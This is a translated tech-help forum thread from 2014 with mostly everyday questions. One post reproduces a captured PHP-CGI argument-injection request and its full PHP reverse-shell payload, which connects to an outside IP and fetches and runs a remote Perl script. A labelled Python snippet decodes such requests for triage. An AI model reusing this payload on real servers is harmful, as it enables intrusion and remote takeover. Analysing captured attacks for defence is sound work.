Moća Posted August 29, 2014

Deleted it, checked the disk via cmd, it says everything is fine, no bad sectors, so I breathed a sigh of relief on that front. But I'll have to do a reinstall later.

katamaran Posted August 29, 2014

> Change the password first. Then go into settings and delete all the applications. Question: does she have a Facebook icon on the desktop, does she have those various toolbars, Facebook instant messenger or something like that?

New developments. Deleting one application stopped the damn thing from spamming that link, but it keeps adding her to groups even after all the applications were deleted. And the activity log just says "was added to random group by" some guy. As far as I can see, only friends can add you to groups, and these guys aren't her friends. I'm totally confused. It's possible that it somehow friends them and then unfriends them after the adding to groups. But then again, how the hell? She hasn't even logged in to Facebook in the last 24h, so that's not a necessary condition for her to get added to groups. All of them some idiotic groups from New Zealand. Mostly car-related.

Edited August 29, 2014 by katamaran

maheem Posted August 30, 2014

YouTube shuts down my computer after about 15 minutes?! Does anyone have an idea what it could be? Some kind of overheating, I assume?

edit: it's a desktop

Edited August 30, 2014 by maheem

mei Posted August 31, 2014

My HTTP server at home got attacked with this:

```
POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
```

which decodes to this:

```
POST /cgi-bin/php.cgi?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n HTTP/1.1
```

this is the POST data, from my log:

```
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] <?php
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] set_time_limit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $ip = '91.121.105.21';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $port = 22;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $chunk_size = 1400;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $write_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $error_a = null;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $shell = 'unset HISTFILE; unset HISTSIZE; uname -a; wget 208.85.177.238/speedtest/.a/hb/php01 -O /tmp/.bash_h1s7;perl /tmp/.bash_h1s7;rm -rf /tmp/.bash_h1s7';
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $debug = 0;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (function_exists('pcntl_fork')) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $pid = pcntl_fork();
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't fork");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($pid) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (posix_setsid() == -1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("Error: Can't setsid()");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $daemon = 1;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] } else {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("WARNING: Failed to daemonise.");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] chdir("/");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] umask(0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $sock = fsockopen($ip, $port, $errno, $errstr, 30);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$sock) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("$errstr ($errno)");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $descriptorspec = array(
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 0 => array("pipe", "r"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 1 => array("pipe", "w"),
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] 2 => array("pipe", "w")
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] );
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $process = proc_open($shell, $descriptorspec, $pipes);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!is_resource($process)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Can't spawn shell");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[0], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[1], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($pipes[2], 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] stream_set_blocking($sock, 0);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] while (1) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($sock)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell connection terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (feof($pipes[1])) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] printit("ERROR: Shell process terminated");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] break;
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $read_a = array($sock, $pipes[1], $pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($sock, $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($sock, $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("SOCK: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($pipes[0], $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[1], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[1], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDOUT: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (in_array($pipes[2], $read_a)) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR READ");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] $input = fread($pipes[2], $chunk_size);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if ($debug) printit("STDERR: $input");
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fwrite($sock, $input);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3]
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($sock);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[0]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[1]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] fclose($pipes[2]);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] proc_close($process);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] function printit ($string) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] if (!$daemon) {
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] print "$string
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ";
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] }
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] exit(1);
2014-08-30 09:43:13-0400 [HTTPChannel,91,187.63.160.3] ?>
```

so what do I do now, i.e. what should I check
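
An added triage example (not part of mei's post or any reply): it decodes a request line the way a CGI server treats a query string with no literal `=`, splitting it on `+` into command-line words, and reports which php.ini overrides the request tried to set. The sample lines are constructed, the first shortened from the request in the post; the function names are hypothetical.

```python
from urllib.parse import unquote

# Constructed sample request lines; the first is shortened from the request
# quoted in the post (two of its -d directives plus the trailing -n).
SAMPLES = [
    "POST /cgi-bin/php.cgi?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E"
    "+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74"
    "+%2D%6E HTTP/1.1",
    "GET /index.php?page=2&sort=asc HTTP/1.1",     # ordinary form-style query
    "GET /cgi-bin/php.cgi?hello+world HTTP/1.1",   # search words, no switches
]

def injected_switches(request_line):
    """Return the command-line words smuggled in the query string, or []."""
    parts = request_line.split()
    if len(parts) < 2 or "?" not in parts[1]:
        return []
    raw_query = parts[1].split("?", 1)[1]
    # A literal "=" makes the query form data, not argv, which is why the
    # sender percent-encodes it as %3D. Test the raw string before decoding.
    if "=" in raw_query:
        return []
    argv = [unquote(word) for word in raw_query.split("+")]
    return argv if argv[0].startswith("-") else []

def ini_overrides(argv):
    """Collect the key=value pairs that follow each -d switch."""
    overrides = {}
    for flag, value in zip(argv, argv[1:]):
        if flag == "-d" and "=" in value:
            key, _, val = value.partition("=")
            overrides[key] = val.strip('"')
    return overrides

def triage(request_line):
    """Summarise one request line for a log review (hypothetical helper)."""
    argv = injected_switches(request_line)
    overrides = ini_overrides(argv)
    return {
        "switches": argv,
        "overrides": overrides,
        # auto_prepend_file=php://input asks PHP to run the POST body as code.
        "body_runs_as_php": overrides.get("auto_prepend_file") == "php://input",
    }

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

Whether such a request did anything depends on the response the server gave: a 404 for that path means no interpreter was reachable there.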

djili Posted August 31, 2014

maybe it's just a bot, look at what these people say, and the related questions.

http://stackoverflow.com/questions/20576530/is-my-site-being-attacked-suhosin-simulation-very-strange-activity-in-ip-log

http://stackoverflow.com/questions/18008646/can-anyone-explain-this-php-code-injection-attack-to-me

Edited August 31, 2014 by djili

katamaran Posted August 31, 2014

Continuing the investigation into my sister's hanging out with New Zealanders.

The whole story starts with liking some clip on one of our brain-dead and, above all, "seems legit" pages with video clips. I'd rather not link that idiocy of a page... There my brother-in-law used her account to like some video in order to watch it, then allegedly remembered halfway through that we had told him not to do that, and allegedly gave up. Anyway, that's when "likes a kretenski video on kretenskisajt.com" showed up on her profile, and after that the adding to NZ groups started, along with spamming WATCH MOVIES FREE AND ENJOY nekisajtzastrimovanjefilmova.info

By killing off the applications I stopped the spamming, but she still ends up in groups. Only now at a reduced rate of about two a day. I deleted all her applications and games and even turned off the application platform, but nothing helps.

edit: when I googled what she was spamming, more of our people who post it show up, so I'm sure that page is the cause.

Edited August 31, 2014 by katamaran

ToniAdams Posted August 31, 2014

downloaded something from kioks, and now in that folder, among other things, I have 5 iso files of 200-500 MB. what do I do now?

wall Posted August 31, 2014

> downloaded something from kioks, and now in that folder, among other things, I have 5 iso files of 200-500 MB. what do I do now?

Burn them to CD.

maheem Posted August 31, 2014

> overheating, clean the fan on the CPU

thanks renne. I'll do that. today it works OK, but it looks like it's time for it to retire

wall Posted August 31, 2014

> Burn them to CD.

Edit: And if you don't need it on CDs, you can unpack it on the disk... I don't know what it is...

katamaran Posted August 31, 2014

> Burn them to CD.

so 19th century :) you install a virtual drive and just mount it. You load the iso file and the computer behaves as if you had inserted a disc with that data

wall Posted August 31, 2014

> so 19th century :) you install a virtual drive and just mount it. You load the iso file and the computer behaves as if you had inserted a disc with that data

:) Maybe he needs it that way.

Töölönlahti Posted August 31, 2014

> so what do I do now

I can't read the code from my phone right now, but definitely update PHP and don't keep the interpreter in /cgi/bin/ any longer.

ToniAdams Posted August 31, 2014

> so 19th century :) you install a virtual drive and just mount it. You load the iso file and the computer behaves as if you had inserted a disc with that data

wait, do I load all 5 or is each one separate?